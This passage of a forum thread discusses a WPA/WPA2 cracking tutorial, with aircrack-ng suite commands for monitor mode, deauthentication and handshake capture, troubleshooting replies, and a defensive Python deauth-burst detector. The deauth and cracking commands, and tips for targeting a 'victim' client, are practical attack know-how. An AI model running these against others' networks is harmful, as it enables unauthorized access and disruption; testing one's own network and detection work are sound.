
Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

  1. #331
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default

    If you know for a fact there is a station connected, and I'm presuming you do, as you should on your own network, then you are either too far away (what's the power?) or your card is on the wrong channel.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  2. #332
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    10

    Default short tx

    I've been reading this forum for quite a bit (^^) and just wanted to say thanks; it's very helpful, and it helped me secure my network after seeing that some people were using my bandwidth without asking.

    So thanks.


    P.S. Sorry for my bad English, but I'm French ^^ and trying to do my best, so if you feel like making some corrections, go for it; it will help me too.

  3. #333
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    17

    Default

    First off I would like to thank Xploitz for the awesome video tutorial....


    I am having the same issue like mohsen1...the last command with results of "sending 64 directed DeAuth...." is this wrong? or is it my crappy card that I cannot get a handshake? I cannot even get my card to inject (highly believe it's my driver issue)...thinking on getting a real card now if it's really the problem.

    Quote Originally Posted by mohsen1 View Post
    bt ~ # airmon-ng stop ath0


    Code:
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    eth1            ZyDAS           zd1211rw
    bt ~ # airmon-ng start wifi0

    Code:
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    eth1            ZyDAS           zd1211rw
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)



    bt ~ # airodump-ng ath0

    Code:
     CH 13 ][ Elapsed: 32 s ][ 2008-07-25 18:51
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:13:46:1C:A5:AB   26       39        0    0   9  54. WEP  WEP         Persian_IT
     00:11:50:1C:D3:1D   18       37        0    0  11  54  WPA  TKIP   PSK  belkin54g
     00:D0:D6:0A:04:16   12       17        0    0  11  54. WEP  WEP         LAN1-AP045941
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes




    airodump-ng -c 11 -w wpa --bssid 00:11:50:1C:D3:1D ath0
    Code:
     CH 11 ][ Elapsed: 3 mins ][ 2008-07-25 20:00
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:11:50:1C:D3:1D   20  80     1774      137    0  11  54  WPA  TKIP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:11:50:1C:D3:1D  E8:8D:75:DE:80:5C   17   0- 1     0      147
     00:11:50:1C:D3:1D  00:1E:4C:AF:89:59    9   1- 1     0      154  belkin54g


    bt ~ # aireplay-ng -0 1 -a 00:11:50:1C:D3:1D -c e8:8d:75:de:80:5c ath0

    Code:
    20:01:34  Waiting for beacon frame (BSSID: 00:11:50:1C:D3:1D) on channel 11
    20:01:34  Sending 64 directed DeAuth. STMAC: [E8:8D:75:DE:80:5C] [ 0| 1 ACKs]

    I am using BackTrack 3 final installed on my hard drive.

    Thank You

  4. #334
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by llvllonk View Post
    First off I would like to thank Xploitz for the awesome video tutorial....


    I am having the same issue like mohsen1...the last command with results of "sending 64 directed DeAuth...." is this wrong? or is it my crappy card that I cannot get a handshake? I cannot even get my card to inject (highly believe it's my driver issue)...thinking on getting a real card now if it's really the problem.
    Sending out a deauth packet will require that your card is capable of injecting. What steps have you taken to confirm that you are unable to inject?

    The best way to test your card is to perform the injection test in aireplay-ng (-9) and if it indeed is unsuccessful it might be related to either your card or the driver. Do a search on the forum with your card model and I am sure you will find some more information on whether it is supported or not.
    -Monkeys are like nature's humans.

  5. #335
    Just burned his ISO
    Join Date
    Jul 2006
    Posts
    17

    Default

    I'm getting about 35 keys / sec which seems really slow. Is this normal?

  6. #336
    Junior Member mRM3e's Avatar
    Join Date
    Oct 2008
    Posts
    28

    Default

    Quote Originally Posted by JF1980 View Post
    I'm getting about 35 keys / sec which seems really slow. Is this normal?
    Could you explain a little further?
    I feel sorry for them - those who take authority as the truth and not truth as the authority -- Zeitgeist

  7. #337
    Just burned his ISO
    Join Date
    Jul 2006
    Posts
    17

    Default

    I'm not sure how I could make that any more straightforward of a question. I get about 35 keys per second while using aircrack-ng; this seems slow. Is that normal or do I have a problem with my setup?

  8. #338
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    17

    Default

    Quote Originally Posted by =Tron= View Post
    Sending out a deauth packet will require that your card is capable of injecting. What steps have you taken to confirm that you are unable to inject?

    The best way to test your card is to perform the injection test in aireplay-ng (-9) and if it indeed is unsuccessful it might be related to either your card or the driver. Do a search on the forum with your card model and I am sure you will find some more information on whether it is supported or not.
    Thanks Tron. I did the suggested test and it fails; that's why I think injection does not work. The Offensive-Security site (backtrack.offensive-security.com/index.php/HCL:Wireless) states my Netgear MA401 is able to inject with the HostAP driver. The Hostap site (hostap.epitest.fi) has a newer driver than the one built into BT3 (however, being the noob that I am....troubles updating the driver due to some changes in directories I believe).

    Today, the strange thing was that I injected successfully one time with fakeauth in attempt to crack WEP; don't know if it was luck or not, because it didn't work afterwards...

    So yeah, still trying to update the driver...but I think I'll try a WEP crack again...don't know why it worked once (I was spamming the command O.o)

  9. #339
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    10

    Default

    Thanks for the great tutorial....I now understand how this works. My only issue is the handshake...I'm deauthing
    Sending 64 directed DeAuth. STMAC: [00:1F:29:F8:3F:3A] [14|20 ACKs]

    but am having no luck with the 4-way. I deauth it like 20 times; sometimes I get more ACKs, sometimes less.....any ideas?

  10. #340

    Default

    Quote Originally Posted by CableTech View Post
    Thanks for the great tutorial....I now understand how this works. My only issue is the handshake...I'm deauthing
    Sending 64 directed DeAuth. STMAC: [00:1F:29:F8:3F:3A] [14|20 ACKs]

    but am having no luck with the 4-way. I deauth it like 20 times; sometimes I get more ACKs, sometimes less.....any ideas?
    What kind of client are you deauthing? Sometimes Linux will not auto-reconnect to a WPA network.

    Sending 64 directed DeAuth
    ! 64 times is probably overkill. Remember, the purpose of sending a deauth packet is to force the client to reconnect. Your victim may be dying from so many deauths. Cut it down to 3 or 4 deauth packets.

    You don't mention how long you wait for the client to re-auth? It can take a few minutes depending on the victim's wireless management software. Do you see your victim box lose its connection and do you see the victim reconnect?

    Make sure you are sniffing only on the channel your victim and AP are using.

    Have you looked through your capture using Wireshark to see if you have captured the 4-way handshake? Filter for "eapol" (no quotes) to check.

    Without knowing exactly what you did command (and response) wise, that's about all I can think to check.

    Good Luck...
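
Added example, not part of any post in this thread: the "Sending 64 directed DeAuth" bursts discussed above are also what a network owner can watch for on their own network. This Python code parses raw 802.11 management headers and flags any destination/BSSID pair that receives many deauthentication frames within a short window; the threshold, window, function names and sample addresses are assumptions made for the example.

```python
import struct
from collections import defaultdict, deque

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for an 802.11 deauth frame, else None."""
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    fc, = struct.unpack_from("<H", frame, 0)
    if fc & 0x00FF != 0x00C0:                # version 0, type 0 (mgmt), subtype 12
        return None
    reason, = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def find_deauth_bursts(frames, threshold=10, window=1.0):
    """frames: (timestamp_seconds, raw 802.11 frame without radiotap header).
    Returns [(dst, bssid, peak_count)] for each dst/BSSID pair that received
    at least `threshold` deauths within `window` seconds (assumed values)."""
    recent, peaks = defaultdict(deque), {}
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        dst, _src, bssid, _reason = parsed
        q = recent[(dst, bssid)]
        q.append(ts)
        while ts - q[0] > window:            # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            peaks[(dst, bssid)] = max(peaks.get((dst, bssid), 0), len(q))
    return sorted((d, b, n) for (d, b), n in peaks.items())

# --- constructed sample capture (all addresses are made up) ---
AP, CLIENT, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:10", "02:00:00:00:00:20"

def _mk(fc0, dst, src, bssid, reason=7):
    h = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([fc0, 0, 0, 0]) + h(dst) + h(src) + h(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

def sample_capture():
    frames = [(0.0, _mk(0x80, "FF:FF:FF:FF:FF:FF", AP, AP))]   # beacon-type frame
    frames += [(1.0 + i * 0.002, _mk(0xC0, CLIENT, AP, AP)) for i in range(64)]
    frames.append((5.0, _mk(0xC0, OTHER, AP, AP, reason=3)))   # lone deauth
    return frames

if __name__ == "__main__":
    print(find_deauth_bursts(sample_capture()))
```

The lone deauth to the second client is not reported; only the 64-frame burst crosses the threshold.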
